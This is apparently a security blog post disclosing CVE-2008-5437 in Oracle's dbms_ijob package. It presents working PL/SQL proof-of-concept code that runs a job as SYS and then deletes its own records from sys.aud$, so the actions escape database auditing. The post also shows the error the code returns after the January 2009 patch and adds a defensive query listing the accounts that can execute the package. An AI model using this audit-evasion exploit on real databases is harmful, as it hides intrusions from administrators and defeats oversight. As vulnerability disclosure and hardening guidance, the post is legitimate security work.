Here is the proof of concept code for the issue in dbms_ijob [CVE-2008-5437] from Volker Solinus, a really smart DBA, my former colleague from Oracle Consulting Germany.
A different bug concerning Auditing reported by us is still open. Oracle Auditing alone is not sufficient because there are various ways to bypass it. Often it is better to use a 3rd-party solution like Hedgehog from Sentrigo.
-- Bypassing Oracle Auditing
-- Everything executed via dbms_ijob (granted to DBAs by default)
-- will not appear in the Oracle auditing
-- by Volker Solinus
declare
  jj integer := 666666; -- job number
begin
  sys.dbms_ijob.submit(
    JOB => jj,
    LUSER => 'SYS',
    PUSER => 'SYS',
    CUSER => 'SYS',
    NEXT_DATE => sysdate,
    INTERVAL => null,
    BROKEN => false,
    WHAT => '
declare
  jj integer := '||jj||';
begin
  execute immediate ''alter system archive log current'';
  sys.dbms_ijob.remove(jj);
  delete from sys.aud$ where obj$name = ''DBMS_IJOB'';
  commit;
end;',
    NLSENV => 'NLS_LANGUAGE=''AMERICAN'' NLS_TERRITORY=''AMERICA'' NLS_CURRENCY=''$'' NLS_ISO_CURRENCY=''AMERICA'' NLS_NUMERIC_CHARACTERS=''.,'' NLS_DATE_FORMAT=''DD-MON-RR'' NLS_DATE_LANGUAGE=''AMERICAN'' NLS_SORT=''BINARY''',
    ENV => hextoraw('0102000200000000'));
  sys.dbms_ijob.run(jj);
exception when others then
  if sqlcode=-12011 then
    sys.dbms_ijob.remove(jj);
  end if;
  raise;
end;
/
After applying the January CPU 2009 you will get the following error message:
ERROR at line 1:
ORA-12718: operation requires connection as SYS
ORA-06512: at line 32
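
Since the bypass depends on who can execute sys.dbms_ijob, the following query lists every grantee that can reach the package, directly or through nested roles. It is an added example, not part of the original post or of Volker Solinus's code, and it assumes SELECT access to the DBA_TAB_PRIVS, DBA_ROLE_PRIVS and DBA_USERS dictionary views; the column aliases are illustrative.

```sql
-- Added example: who can execute SYS.DBMS_IJOB, directly or via roles?
WITH direct_grants AS (
    -- users, roles or PUBLIC holding EXECUTE on the package itself
    SELECT grantee
    FROM   dba_tab_privs
    WHERE  owner      = 'SYS'
    AND    table_name = 'DBMS_IJOB'
    AND    privilege  = 'EXECUTE'
),
inherited AS (
    -- walk role grants outward from every role that holds the privilege
    SELECT grantee,
           CONNECT_BY_ROOT granted_role AS via_role,
           SYS_CONNECT_BY_PATH(granted_role, ' > ') || ' > ' || grantee AS grant_path
    FROM   dba_role_privs
    START WITH granted_role IN (SELECT grantee FROM direct_grants)
    CONNECT BY NOCYCLE PRIOR grantee = granted_role
)
-- direct grantees (account_status is NULL for roles and PUBLIC)
SELECT d.grantee        AS grantee,
       u.account_status AS account_status,
       'direct grant'   AS how,
       TO_CHAR(NULL)    AS grant_path
FROM   direct_grants d
LEFT   JOIN dba_users u ON u.username = d.grantee
UNION
-- database users that inherit the privilege through one or more roles
SELECT u.username,
       u.account_status,
       'via role ' || i.via_role,
       i.grant_path
FROM   inherited i
JOIN   dba_users u ON u.username = i.grantee
ORDER  BY 1, 3;
```

Any account in the result other than the expected DBA accounts is a candidate for revoking the role or grant that appears in grant_path.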